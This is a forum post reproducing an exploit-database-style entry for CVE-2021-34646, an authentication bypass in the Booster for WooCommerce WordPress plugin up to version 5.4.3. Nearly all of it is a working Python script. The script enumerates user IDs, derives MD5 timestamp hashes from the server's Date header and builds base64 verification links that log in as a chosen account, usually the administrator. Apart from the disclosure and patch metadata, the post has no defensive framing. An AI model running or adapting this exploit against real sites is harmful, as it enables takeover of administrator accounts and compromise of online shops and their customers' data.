WordPress WooCommerce Booster 5.4.3 Authentication Bypass

#304
Topic created · 1 Posts · 1 Views
  • # Exploit Title: WordPress Plugin WooCommerce Booster Plugin 5.4.3 - Authentication Bypass
    # Date: 2021-09-16
    # Exploit Author: Sebastian Kriesten (0xB455)
    # Contact: https://twitter.com/0xB455
    #
    # Affected Plugin: Booster for WooCommerce
    # Plugin Slug: woocommerce-jetpack
    # Vulnerability disclosure: https://www.wordfence.com/blog/2021/08/critical=-authentication-bypass-vulnerability-patched-in-booster-for-woocommerce/
    # Affected Versions: <= 5.4.3
    # Fully Patched Version: >= 5.4.4
    # CVE: CVE-2021-34646
    # CVSS Score: 9.8 (Critical)
    # Category: webapps
    #
    # 1:
    # Goto: https://target.com/wp-json/wp/v2/users/
    # Pick a user-ID (e.g. 1 - usualy is the admin)
    #
    # 2:
    # Attack with: ./exploit\_CVE-2021-34646.py https://target.com/ 1
    #
    # 3:
    # Check-Out out which of the generated links allows you to access the system
    #
    import requests,sys,hashlib
    import argparse
    import datetime
    import email.utils
    import calendar
    import base64
    
    B = "\033[94m"
    W = "\033[97m"
    R = "\033[91m"
    RST = "\033[0;0m"
    
    parser = argparse.ArgumentParser()
    parser.add\_argument("url", help="the base url")
    parser.add\_argument('id', type=int, help='the user id', default=1)
    args = parser.parse\_args()
    id = str(args.id)
    url = args.url
    if args.url[-1] != "/": # URL needs trailing /
     url = url + "/"
    
    verify\_url= url + "?wcj\_user\_id=" + id
    r = requests.get(verify\_url)
    
    if r.status\_code != 200:
     print("status code != 200")
     print(r.headers)
     sys.exit(-1)
    
    def email\_time\_to\_timestamp(s):
     tt = email.utils.parsedate\_tz(s)
     if tt is None: return None
     return calendar.timegm(tt) - tt[9]
    
    date = r.headers["Date"]
    unix = email\_time\_to\_timestamp(date)
    
    def printBanner():
     print(f"{W}Timestamp: {B}" + date)
     print(f"{W}Timestamp (unix): {B}" + str(unix) + f"{W}\n")
     print("We need to generate multiple timestamps in order to avoid delay related timing errors")
     print("One of the following links will log you in...\n")
    
    printBanner()
    
    
    
    for i in range(3): # We need to try multiple timestamps as we don't get the exact hash time and need to avoid delay related timing errors
     hash = hashlib.md5(str(unix-i).encode()).hexdigest()
     print(f"{W}#" + str(i) + f" link for hash {R}"+hash+f"{W}:")
     token='{"id":"'+ id +'","code":"'+hash+'"}'
     token = base64.b64encode(token.encode()).decode()
     token = token.rstrip("=") # remove trailing =
     link = url+"my-account/?wcj\_verify\_email="+token
     print(link + f"\n{RST}")
     
    
    
    
    
Log in to reply